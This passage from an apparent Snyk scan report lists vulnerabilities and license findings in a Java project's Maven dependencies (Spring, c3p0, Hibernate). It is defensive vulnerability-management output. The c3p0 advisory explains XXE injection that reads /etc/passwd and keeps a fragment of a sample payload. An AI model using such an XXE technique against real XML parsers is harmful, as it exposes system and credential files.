"semver": { - "vulnerable": [ - "[,5.2.22.RELEASE)", - "[5.3.0,5.3.20)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.22.RELEASE", - "5.3.20" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-beans", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583", - "title": "GitHub Commit" - }, - { - "url": "https://tanzu.vmware.com/security/cve-2022-22970", - "title": "Tanzu vmware" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:47:28.086179Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:49:48.407397Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:21.626910Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:28.086179Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:48.407397Z" - } - ], - "description": "## 
Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) if it relies on data binding to set a `MultipartFile` or `javax.servlet.Part` to a field in a model object.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.22.RELEASE, 5.3.20 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583)\n- [Tanzu vmware](https://tanzu.vmware.com/security/cve-2022-22970)\n", - "epssDetails": { - "percentile": "0.75300", - "probability": "0.00449", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22970" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.springframework:spring-beans", - "proprietary": false, - "creationTime": "2022-05-12T08:45:35.744127Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-05-12T08:17:10Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-beans" - }, - "publicationTime": "2022-05-12T09:49:10.833602Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:48.407397Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-context@5.2.22.RELEASE", - "org.springframework:spring-beans@5.2.22.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-beans", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", - "title": "Improper Handling of Case 
Sensitivity", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,5.2.21)", - "[5.3.0, 5.3.19)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "5.2.21", - "5.3.19" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "low", - "cvssScore": 3.7, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-context", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/28333", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/MarcinGadz/spring-rce-poc", - "title": "PoC" - }, - { - "url": "https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968", - "title": "Spring Blog Post" - }, - { - "url": "https://tanzu.vmware.com/security/cve-2022-22968", - "title": "Tanzu Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:47:26.822810Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:49:16.458425Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", - "assigner": "Snyk", - "severity": "low", - "baseScore": 3.7, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:31.233852Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": 
"2024-03-11T09:47:26.822810Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:16.458425Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity via the patterns for `disallowedFields` on a `DataBinder`. As a result, a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including nested fields within the property path.\n## Remediation\nUpgrade `org.springframework:spring-context` to version 5.2.21, 5.3.19 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28333)\n- [PoC](https://github.com/MarcinGadz/spring-rce-poc)\n- [Spring Blog Post](https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968)\n- [Tanzu Advisory](https://tanzu.vmware.com/security/cve-2022-22968)\n", - "epssDetails": { - "percentile": "0.29205", - "probability": "0.00065", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22968" - ], - "CWE": [ - "CWE-178" - ] - }, - "packageName": "org.springframework:spring-context", - "proprietary": false, - "creationTime": "2022-04-14T11:54:10.207823Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-04-14T11:43:54Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-context" - 
}, - "publicationTime": "2022-04-14T12:09:40Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:16.458425Z", - "socialTrendAlert": false, - "severityWithCritical": "low", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-context@5.2.21.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-context", - "version": "3.2.6.RELEASE" - }, - { - "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.5.4,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.aspectj:aspectjweaver", - "creationTime": "2024-06-18T21:24:04.112Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T21:24:04.112Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.aspectj:aspectjweaver@1.8.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.aspectj:aspectjweaver", - "version": "1.8.2" - }, - { - "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", - "type": "license", - "title": "LGPL-2.1 license", - "semver": { - "vulnerable": [ - "[4.0.0.CR1,)" - ] - }, - "license": "LGPL-2.1", - "language": "java", - "description": "LGPL-2.1 license", - "packageName": "org.hibernate.common:hibernate-commons-annotations", - "creationTime": "2024-06-18T11:03:46.980Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:03:46.980Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" - ], - "upgradePath": [], - 
"isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate.common:hibernate-commons-annotations", - "version": "4.0.5.Final" - }, - { - "id": "snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.0.0.Final,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "creationTime": "2024-06-18T12:03:42.953Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T12:03:42.953Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "version": "1.0.0.Final" - }, - { - "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { - "vulnerable": [ - "[3.5.0.Beta-1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-entitymanager", - "creationTime": "2024-06-18T11:52:01.913Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:52:01.913Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-entitymanager@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate:hibernate-entitymanager", - "version": "4.3.7.Final" - } - ], - "ok": false, - "dependencyCount": 34, - "org": "austin.doll", - "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known 
vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", - "isPrivate": true, - "licensesPolicy": { - "severities": {}, - "orgLicenseRules": { - "AGPL-1.0": { - "licenseType": "AGPL-1.0", - "severity": "high", - "instructions": "" - }, - "AGPL-3.0": { - "licenseType": "AGPL-3.0", - "severity": "high", - "instructions": "" - }, - "Artistic-1.0": { - "licenseType": "Artistic-1.0", - "severity": "medium", - "instructions": "" - }, - "Artistic-2.0": { - "licenseType": "Artistic-2.0", - "severity": "medium", - "instructions": "" - }, - "CDDL-1.0": { - "licenseType": "CDDL-1.0", - "severity": "medium", - "instructions": "" - }, - "CPOL-1.02": { - "licenseType": "CPOL-1.02", - "severity": "high", - "instructions": "" - }, - "EPL-1.0": { - "licenseType": "EPL-1.0", - "severity": "medium", - "instructions": "" - }, - "GPL-2.0": { - "licenseType": "GPL-2.0", - "severity": "high", - "instructions": "" - }, - "GPL-3.0": { - "licenseType": "GPL-3.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.0": { - "licenseType": "LGPL-2.0", - "severity": "medium", - "instructions": "" - }, - "LGPL-3.0": { - "licenseType": "LGPL-3.0", - "severity": "medium", - "instructions": "" - }, - "MPL-1.1": { - "licenseType": "MPL-1.1", - "severity": "medium", - "instructions": "" - }, - "MPL-2.0": { - "licenseType": "MPL-2.0", - "severity": "medium", - "instructions": "" - }, - "MS-RL": { - "licenseType": "MS-RL", - "severity": "medium", - "instructions": "" - }, - "SimPL-2.0": { - "licenseType": "SimPL-2.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.1": { - "licenseType": "LGPL-2.1", - "severity": "medium", - "instructions": "" - } - } - }, - "packageManager": "maven", - "ignoreSettings": { - "adminOnly": false, - "reasonRequired": true, - "disregardFilesystemIgnores": false - }, - "summary": "22 vulnerable dependency paths", - "remediation": { - "unresolved": [ - { - "id": "SNYK-JAVA-C3P0-461017", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", - "title": "GitHub Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:06.803024Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:48:09.230623Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:45.369849Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.803024Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:09.230623Z" - } - ], - "description": "## 
Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", - "epssDetails": { - "percentile": "0.78365", - "probability": "0.00585", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-20433" - ], - "CWE": [ - "CWE-611" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:17:58.383761Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-12-24T13:29:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-07-21T14:22:18Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:09.230623Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2", - "severityWithCritical": "critical" - }, - { - "id": "SNYK-JAVA-C3P0-461018", - "title": "Denial 
of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://hackerone.com/reports/509315", - "title": "POC: Hackerone Report" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 4.4, - "modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:02:14.895852Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.4, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "description": "## 
Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", - "epssDetails": { - "percentile": "0.90102", - "probability": "0.02457", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-5427" - ], - "CWE": [ - "CWE-776" - ], - "GHSA": [ - "GHSA-84p2-vf58-xhxv" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:24:58.914446Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-04-22T22:18:26Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-04-22T22:18:26Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:53.496388Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2", - "severityWithCritical": "high" - }, - { - "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", - "type": "license", - "title": "LGPL-3.0 license", - "semver": { - "vulnerable": [ - "[0,)" - ] - }, - "license": "LGPL-3.0", - "language": "java", - "description": "LGPL-3.0 license", - "packageName": "c3p0:c3p0", - "creationTime": "2024-06-18T02:35:42.971Z", - "packageManager": "maven", - 
"publicationTime": "2024-06-18T02:35:42.971Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2", - "severityWithCritical": "medium" - }, - { - "id": "snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { - "vulnerable": [ - "[3.3.0.CR1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-core", - "creationTime": "2024-06-18T19:09:16.096Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T19:09:16.096Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final", - "severityWithCritical": "medium" - }, - { - "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.5.4,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.aspectj:aspectjweaver", - "creationTime": "2024-06-18T21:24:04.112Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T21:24:04.112Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.aspectj:aspectjweaver@1.8.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.aspectj:aspectjweaver", - "version": "1.8.2", - "severityWithCritical": "medium" - }, - { - "id": 
"snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", - "type": "license", - "title": "LGPL-2.1 license", - "semver": { - "vulnerable": [ - "[4.0.0.CR1,)" - ] - }, - "license": "LGPL-2.1", - "language": "java", - "description": "LGPL-2.1 license", - "packageName": "org.hibernate.common:hibernate-commons-annotations", - "creationTime": "2024-06-18T11:03:46.980Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:03:46.980Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate.common:hibernate-commons-annotations", - "version": "4.0.5.Final", - "severityWithCritical": "medium" - }, - { - "id": "snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.0.0.Final,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "creationTime": "2024-06-18T12:03:42.953Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T12:03:42.953Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": 